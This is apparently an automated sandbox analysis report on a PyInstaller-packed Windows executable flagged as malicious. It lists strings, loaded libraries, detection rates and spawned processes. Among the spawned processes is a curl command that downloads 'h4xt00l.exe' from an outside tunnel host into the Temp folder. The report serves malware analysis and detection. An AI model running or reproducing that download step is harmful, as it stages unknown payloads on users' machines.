libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: curl.exe, 00000002.00000003.1744460082.000001AFC635E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744252579.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744193429.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC6360000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744315682.000001AFC63BC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744365340.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, h4xt00l.exe.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito:700
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: curl.exe, 00000002.00000002.1744746751.000001AFC6340000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe
Source: curl.exe, 00000002.00000002.1744746751.000001AFC6349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe--outputC:
Source: curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exe?
Source: curl.exe, 00000002.00000003.1744436719.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744492924.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1744564320.000001AFC637B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1744803181.000001AFC637C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://haxerr.eu.loclx.io/h4xt00l.exeQ
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
Source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://peps.python.org/pep-0263/
Source: libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
Source: aLsxeH29P2.exe, 00000001.00000002.2975354634.00007FFDFB768000.00000008.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://www.python.org/psf/license/
Source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.drString found in binary or memory: https://www.python.org/psf/license/)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 167.99.38.229:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD89E00_2_00007FF7F3DD89E0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF69640_2_00007FF7F3DF6964
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF08C80_2_00007FF7F3DF08C8
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD10000_2_00007FF7F3DD1000
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDACAD0_2_00007FF7F3DDACAD
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDA47B0_2_00007FF7F3DDA47B
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF08C80_2_00007FF7F3DF08C8
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF64180_2_00007FF7F3DF6418
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF5C000_2_00007FF7F3DF5C00
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE2C100_2_00007FF7F3DE2C10
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF3C100_2_00007FF7F3DF3C10
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE1B500_2_00007FF7F3DE1B50
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDA2DB0_2_00007FF7F3DDA2DB
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DEDA5C0_2_00007FF7F3DEDA5C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE39A40_2_00007FF7F3DE39A4
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE21640_2_00007FF7F3DE2164
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE19440_2_00007FF7F3DE1944
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE80E40_2_00007FF7F3DE80E4
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF40AC0_2_00007FF7F3DF40AC
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF18740_2_00007FF7F3DF1874
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD98000_2_00007FF7F3DD9800
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE87940_2_00007FF7F3DE8794
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE1F600_2_00007FF7F3DE1F60
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE17400_2_00007FF7F3DE1740
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF97280_2_00007FF7F3DF9728
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DEDEF00_2_00007FF7F3DEDEF0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE9EA00_2_00007FF7F3DE9EA0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF5E7C0_2_00007FF7F3DF5E7C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE35A00_2_00007FF7F3DE35A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DEE5700_2_00007FF7F3DEE570
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE1D540_2_00007FF7F3DE1D54
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DE5D300_2_00007FF7F3DE5D30
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF69641_2_00007FF7F3DF6964
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD10001_2_00007FF7F3DD1000
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDACAD1_2_00007FF7F3DDACAD
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDA47B1_2_00007FF7F3DDA47B
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF08C81_2_00007FF7F3DF08C8
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF64181_2_00007FF7F3DF6418
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF5C001_2_00007FF7F3DF5C00
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE2C101_2_00007FF7F3DE2C10
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF3C101_2_00007FF7F3DF3C10
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE1B501_2_00007FF7F3DE1B50
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDA2DB1_2_00007FF7F3DDA2DB
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DEDA5C1_2_00007FF7F3DEDA5C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD89E01_2_00007FF7F3DD89E0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE39A41_2_00007FF7F3DE39A4
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE21641_2_00007FF7F3DE2164
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE19441_2_00007FF7F3DE1944
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE80E41_2_00007FF7F3DE80E4
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF08C81_2_00007FF7F3DF08C8
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF40AC1_2_00007FF7F3DF40AC
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF18741_2_00007FF7F3DF1874
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD98001_2_00007FF7F3DD9800
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE87941_2_00007FF7F3DE8794
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE1F601_2_00007FF7F3DE1F60
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE17401_2_00007FF7F3DE1740
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF97281_2_00007FF7F3DF9728
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DEDEF01_2_00007FF7F3DEDEF0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE9EA01_2_00007FF7F3DE9EA0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF5E7C1_2_00007FF7F3DF5E7C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE35A01_2_00007FF7F3DE35A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DEE5701_2_00007FF7F3DEE570
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE1D541_2_00007FF7F3DE1D54
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DE5D301_2_00007FF7F3DE5D30
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FFE126C7CA01_2_00007FFE126C7CA0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: String function: 00007FF7F3DD2710 appears 104 times
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: String function: 00007FF7F3DD2910 appears 34 times
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exeBinary or memory string: OriginalFilename vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000001.00000002.2975586760.00007FFDFB891000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs aLsxeH29P2.exe
Source: aLsxeH29P2.exe, 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs aLsxeH29P2.exe
Source: classification engineClassification label: mal60.winEXE@7/14@1/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522Jump to behavior
Source: aLsxeH29P2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\aLsxeH29P2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: aLsxeH29P2.exeVirustotal: Detection: 50%
Source: aLsxeH29P2.exeReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile read: C:\Users\user\Desktop\aLsxeH29P2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"
Source: C:\Users\user\Desktop\aLsxeH29P2.exeProcess created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"
Source: C:\Users\user\Desktop\aLsxeH29P2.exeProcess created: C:\Windows\System32\curl.exe curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe
Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aLsxeH29P2.exeProcess created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"Jump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeProcess created: C:\Windows\System32\curl.exe curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exeJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: aLsxeH29P2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: aLsxeH29P2.exeStatic file information: File size 7178619 > 1048576
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: aLsxeH29P2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: aLsxeH29P2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for 